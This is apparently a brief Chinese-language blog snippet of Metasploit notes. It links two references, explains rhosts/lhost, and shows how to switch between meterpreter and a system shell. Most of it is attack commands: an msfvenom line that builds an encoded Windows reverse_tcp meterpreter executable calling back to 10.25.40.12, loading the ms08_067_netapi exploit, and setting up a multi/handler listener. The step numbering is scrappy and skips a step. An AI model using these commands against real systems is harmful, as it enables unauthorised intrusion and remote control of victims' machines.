1、 https://blog.csdn.net/xiaopan233/article/details/82808386
2、 https://blog.csdn.net/qq_38240166/article/details/79476678
[rhosts 目標機 lhost 原始攻擊機] remoter hosts / local host
在meterpreter 下輸入shell 切換 shell 切換回
meterpreter 直接輸入
exit
附錄
1、使用 反向連接 方式
1、msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=10.25.40.12 LPORT=1234 -f exe >./lcf.exe
2、use windows/smb/ms08_067_netapi
3、use exploit/multi/handler 4、set payload windows/meterpreter/reverse_tcp 5、show options
7、set LHOST 10.25.40.12
創作打卡挑戰賽
贏取流量/現金/CSDN周邊激勵大獎